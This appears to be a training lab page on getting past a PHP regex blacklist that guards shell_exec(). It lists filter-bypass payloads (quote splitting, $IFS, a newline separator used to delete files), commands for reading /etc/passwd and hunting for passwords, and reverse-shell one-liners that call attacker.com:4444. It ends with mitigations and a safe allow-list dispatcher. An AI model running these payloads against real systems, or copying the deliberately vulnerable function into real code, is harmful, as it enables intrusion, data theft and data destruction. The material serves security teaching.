Lab 4: Advanced Command Injection Techniques

Complex command injection bypass techniques

Difficulty: High

Lab Overview

This lab demonstrates command injection techniques that defeat a regex blacklist of the kind often bolted onto a vulnerable endpoint as a quick fix. The techniques covered are quote splitting and escaping, encoding, unfiltered alternative commands with the same effect, and building the command dynamically so that no static pattern matches.

Objective: Use advanced techniques to bypass security filters and achieve command injection.

Advanced Vulnerable Code
// Vulnerable: a regex blacklist that can be bypassed.
// Each pattern looks for a contiguous rm, del or rmdir (and format or fdisk
// at offset 0) either at the start of the input or right after ; | & ` $( .
// The shell metacharacters are never blocked on their own.
function execute_command_advanced($command) {
    $dangerous_patterns = [
        '/^rm\s+/i',
        '/^del\s+/i',
        '/^rmdir\s+/i',
        '/^format\s+/i',
        '/^fdisk\s+/i',
        '/;\s*rm\s+/i',
        '/;\s*del\s+/i',
        '/;\s*rmdir\s+/i',
        '/\|\s*rm\s+/i',
        '/\|\s*del\s+/i',
        '/\|\s*rmdir\s+/i',
        '/&\s*rm\s+/i',
        '/&\s*del\s+/i',
        '/&\s*rmdir\s+/i',
        '/`.*rm.*`/i',
        '/`.*del.*`/i',
        '/`.*rmdir.*`/i',
        '/\$\(.*rm.*\)/i',
        '/\$\(.*del.*\)/i',
        '/\$\(.*rmdir.*\)/i'
    ];
    
    // Blacklist check: the first matching pattern blocks the command
    $is_dangerous = false;
    foreach ($dangerous_patterns as $pattern) {
        if (preg_match($pattern, $command)) {
            $is_dangerous = true;
            break;
        }
    }
    
    if ($is_dangerous) {
        // Blocked: return a message rather than falling through and returning null
        return "Command blocked by filter\n";
    }
    
    // Still vulnerable: anything no pattern matched is handed to /bin/sh unchanged,
    // with stderr merged into stdout
    $output = @shell_exec($command . ' 2>&1');
    return $output;
}
Advanced Command Execution
Advanced Filters

The regex blacklist in the code above checks for:

  • Commands: rm, del, rmdir (at the start of the input, right after ;, | or &, or anywhere inside `...` or $(...)) and format, fdisk (at the start of the input only). The lab text also names mkfs, dd, shutdown, reboot, halt and poweroff, but no pattern in the code shown matches them.
  • Operators: ;, |, &, `, $() are never blocked on their own; they only form part of a pattern when followed by one of the three names above, so whoami; id passes untouched.
  • Patterns: the filtered name must appear contiguously (rm, not r''m) and, outside backticks and $(), be followed by whitespace (\s+); breaking either condition defeats the pattern.
Safe Commands

These commands match no pattern and pass the filter:

  • whoami - Current user
  • id - User ID information
  • pwd - Current directory
  • ls - List files
  • uname -a - System information
Vulnerability Details
  • Type: Advanced Command Injection Techniques
  • Severity: Critical
  • Method: POST
  • Issue: Advanced filters can be bypassed
Advanced Bypass Techniques
  • Obfuscation: split or escape the filtered word (r''m, r\m) so the regex never sees its letters adjacent
  • Encoding: send the payload URL-encoded; %0a gives a newline separator that the ^-anchored patterns never check
  • Alternative Commands: use unfiltered commands with the same effect (find ... -delete instead of rm)
  • String Manipulation: build the command at run time ($IFS instead of spaces, variables, command substitution) so the static pattern does not match
Advanced Command Injection Bypass Payloads

Use these techniques against the filter above. Groups 1 to 3, 9 to 11 and 13 exercise the filter; the other groups are ordinary commands that no pattern matches and are listed for enumeration once injection works.

1. Character Encoding:
PHP URL-decodes the POST body before execute_command_advanced() sees it, so percent-encoding is only the transport form of a payload and hides nothing from the regex. The one encoded character that matters is %0a: the patterns anchor with ^ and have no m modifier, so a command on a second line is never checked.
  • whoami%3B%20id (whoami; id)
  • whoami%7C%20id (whoami | id)
  • whoami%26%20id (whoami & id)
  • whoami%60id%60 (whoami `id`)
  • whoami%24%28id%29 (whoami $(id))
  • whoami%0arm%20/tmp/test.txt (newline, then rm; ^rm\s+ only matches at offset 0)
2. Alternative Characters (the operators are not filtered on their own):
  • whoami && id
  • whoami || id
  • whoami | id
  • whoami `id`
  • whoami $(id)
3. String Concatenation (quote splitting):
The shell removes an empty '' or "" inside a word, so who''ami runs whoami while the regex never sees the letters adjacent. The who' . 'ami form in the original payload list is PHP concatenation, not shell syntax: the shell would strip the quotes and run who with the arguments . and ami.
  • who''ami
  • i""d -u
  • pw''d
  • ls'' -la
  • una''me -a
  • r''m /tmp/test.txt (passes ^rm\s+)
  • rm$IFS/tmp/test.txt (\s+ does not match $IFS; the shell expands it to whitespace)
  • r\m /tmp/test.txt (backslash escape, removed by the shell)
4. Alternative Commands (none of these is filtered):
  • whoami
  • id
  • pwd
  • ls
  • uname -a
  • hostname
  • date
  • uptime
5. File Reading:
  • cat /etc/passwd
  • cat /etc/hosts
  • cat /proc/version
  • cat /proc/cpuinfo
  • cat /proc/meminfo
  • cat /proc/loadavg
6. Process Information:
  • ps aux
  • ps -ef
  • netstat -an
  • ss -tuln
  • lsof -i
  • df -h
  • free -m
7. Network Information:
  • ifconfig
  • ip addr
  • route -n
  • arp -a
  • nslookup google.com
  • ping -c 3 8.8.8.8
8. User Information:
  • groups
  • crontab -l
  • history (prints nothing here: shell_exec() runs a non-interactive sh with no history)
  • env
  • printenv
  • who
  • w
9. Command Chaining:
  • whoami; id; pwd
  • whoami && id && pwd
  • whoami || id || pwd
  • whoami | id | pwd
  • whoami `id` `pwd`
10. Command Substitution:
  • echo $(whoami)
  • echo `id`
  • echo $(cat /etc/passwd)
  • echo `ls -la`
  • echo $(ps aux)
11. Pipes and Redirection:
  • whoami | cat
  • id > /tmp/output.txt
  • ls -la | grep php
  • cat /etc/passwd | head -5
  • ps aux | grep apache
12. Environment Variables (expanded by the shell that shell_exec() spawns, so they describe the web server process):
  • echo $PATH
  • echo $HOME
  • echo $USER
  • echo $SHELL
  • echo $PWD
  • echo $HOSTNAME
13. File Operations:
  • touch /tmp/test.txt
  • echo "test" > /tmp/test.txt
  • cat /tmp/test.txt
  • rm /tmp/test.txt is blocked by ^rm\s+; use r''m /tmp/test.txt or rm$IFS/tmp/test.txt
  • mkdir /tmp/testdir
  • rmdir /tmp/testdir is blocked by ^rmdir\s+; use r''mdir /tmp/testdir
14. Enumeration with find and grep:
The wrapper appends 2>&1 after the command, and redirections apply left to right, so a trailing 2>/dev/null is overridden and error output comes back anyway. Run the command in a subshell to keep the redirection inside it.
  • (find / -name "*.php" 2>/dev/null)
  • (grep -r "password" /var/www/ 2>/dev/null)
  • (find / -perm -4000 2>/dev/null)
  • (find / -writable 2>/dev/null)
  • (find / -type f -name "*.conf" 2>/dev/null)
15. Reverse Shell (Dangerous; attacker.com and 4444 are placeholders for a listener you control):
  • bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1' (/dev/tcp is a bash feature; shell_exec() runs /bin/sh, which may be dash)
  • nc -e /bin/bash attacker.com 4444 (-e exists in traditional netcat and nmap's ncat, not in the OpenBSD variant)
  • python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker.com",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' (use python3 where python is absent)
Mitigation Strategies
  • Do not pass user input to shell_exec(), exec(), system() or passthru() at all; a blacklist like the one above cannot enumerate every spelling the shell accepts
  • Use an allow-list: map a small set of named actions to fixed programs and validate every argument against a strict pattern (length, character class, expected path prefix)
  • Run the program without a shell: proc_open() with an array command (PHP 7.4 and later), or a fixed command string with each argument wrapped in escapeshellarg()
  • Run the web server under a dedicated low-privilege account with no write access outside its own directories, so a bypass yields as little as possible
  • Test the endpoint regularly, including with quote-split, $IFS and newline variants of the filtered words
  • Log and alert on the web server account spawning shells or network tools (sh, bash, nc, python) from the request path
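The allow-list design the first three bullets describe, as an added example in Python (not the lab's code). It models what the PHP function should do instead of shell_exec(): the user names an action from a fixed table, every argument is validated against that entry, and the program runs from an argv list with no shell in between, which is what proc_open() with an array command does in PHP 7.4 and later. The program paths, the flag sets and the /var/www/html root are assumptions chosen for the example.

```python
import re
import shlex
import subprocess

# Added example, not the lab's code: an allow-list dispatcher that replaces
# shell_exec($command). Program paths, flag sets and the /var/www/html root
# are assumptions chosen for the demonstration.
ALLOWED = {
    # name: (argv prefix, flags the user may add, how many path arguments)
    "whoami": (["/usr/bin/whoami"], set(), 0),
    "id":     (["/usr/bin/id"], {"-u", "-g", "-G"}, 0),
    "uname":  (["/bin/uname"], {"-a", "-r", "-m"}, 0),
    "pwd":    (["/bin/pwd"], set(), 0),
    "ls":     (["/bin/ls"], {"-l", "-a", "-la", "-h"}, 1),
}

# Absolute path under the web root; segments may not start with a dot, which
# rules out '..' and dotfiles, and no shell metacharacter is in the class.
PATH_RE = re.compile(r"^/var/www/html(?:/[A-Za-z0-9_-][A-Za-z0-9._-]*)*/?$")


class Rejected(ValueError):
    """Raised when the input does not fit the allow-list exactly."""


def plan_command(user_input):
    """Turn e.g. 'ls -la /var/www/html' into an argv list, or raise Rejected.

    shlex.split() only splits words and strips quotes; it performs no
    expansion, so $IFS, $(...) and backticks stay literal and then fail the
    allow-list. 'whoami; id' becomes the single unknown word 'whoami;'.
    """
    try:
        words = shlex.split(user_input)
    except ValueError as exc:  # unbalanced quotes
        raise Rejected(f"bad quoting: {exc}") from exc
    if not words:
        raise Rejected("empty command")
    name, args = words[0], words[1:]
    if name not in ALLOWED:
        raise Rejected(f"command not allowed: {name!r}")
    prefix, flags, max_paths = ALLOWED[name]
    argv, paths = list(prefix), 0
    for arg in args:
        if arg in flags:
            argv.append(arg)
        elif PATH_RE.match(arg) and paths < max_paths:
            argv.append(arg)
            paths += 1
        else:
            raise Rejected(f"argument not allowed for {name}: {arg!r}")
    return argv


def is_allowed(user_input):
    """True if plan_command() accepts the input; handy for checking payloads."""
    try:
        plan_command(user_input)
    except Rejected:
        return False
    return True


def run_command(user_input, timeout=5):
    """Execute an allowed command with no shell in between."""
    argv = plan_command(user_input)
    # A list argv goes straight to execve(); metacharacters are never parsed.
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
    return proc.stdout + proc.stderr


if __name__ == "__main__":
    for payload in ["uname -a", "whoami; id", "r''m /tmp/x", "ls $(id)",
                    "rm$IFS/tmp/x", "whoami\nrm /tmp/x"]:
        print(f"{payload!r:24} allowed={is_allowed(payload)}")
```

The point of the design is that there is nothing left for a regex to miss: the program is chosen from the table, not from the input, and each argument must match a positive description, so the quote-split, $IFS and newline variants from the payload list are rejected for the same reason a plain rm is. The quoting a caller can still use (ls "/var/www/html") is harmless because shlex only removes it and never expands anything.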